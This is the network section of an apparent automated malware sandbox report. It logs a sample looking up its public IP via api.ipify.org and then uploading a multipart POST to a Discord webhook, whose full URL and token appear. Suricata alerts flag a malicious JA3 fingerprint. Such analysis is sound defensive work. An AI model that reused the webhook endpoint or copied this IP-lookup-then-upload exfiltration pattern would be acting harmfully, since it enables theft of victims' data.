Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| discord.com | 162.159.128.233 | |
| api.ipify.org |
CNAME
api4.ipify.org
|
104.237.62.212 |
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.101:137
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:53676 239.255.255.250:1900
-
52.231.114.183:123 192.168.56.103:123
-
GET
200
https://api.ipify.org/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 15
Content-Type: text/plain
Date: Wed, 14 Dec 2022 00:38:28 GMT
Vary: Origin
POST
100
https://discord.com/api/webhooks/1052047387167838281/ckxOZHqDK9Fs6wm9uehtyNosd3HZGLhQFPhbdBDnWi6cl945WnENSlc0bCmlN0xY5VHH
REQUEST
RESPONSE
BODY
POST /api/webhooks/1052047387167838281/ckxOZHqDK9Fs6wm9uehtyNosd3HZGLhQFPhbdBDnWi6cl945WnENSlc0bCmlN0xY5VHH HTTP/1.1
Content-Type: multipart/form-data; boundary=----------3a9f6ffb19e5494e9e58bf8a4c6f254b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: discord.com
Content-Length: 4543
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| UDP 192.168.56.103:53673 -> 164.124.101.2:53 | 2035465 | ET INFO Observed Discord Domain in DNS Lookup (discord .com) | Misc activity |
| TCP 192.168.56.103:49166 -> 162.159.138.232:443 | 2035463 | ET INFO Observed Discord Domain (discord .com in TLS SNI) | Misc activity |
| TCP 192.168.56.103:49166 -> 162.159.138.232:443 | 906200022 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.103:49162 -> 104.237.62.212:443 | 906200022 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLS 1.2 192.168.56.103:49166 162.159.138.232:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a3:ea:27:1a:3d:e8:8c:05:5e:1c:c8:1d:59:0e:d2:f2:a1:76:4d:2e |
|
TLS 1.2 192.168.56.103:49162 104.237.62.212:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.ipify.org | 19:d7:90:9b:94:40:47:10:c8:4d:0f:e1:85:86:d5:0f:1c:15:9e:f4 |
Snort Alerts
No Snort Alerts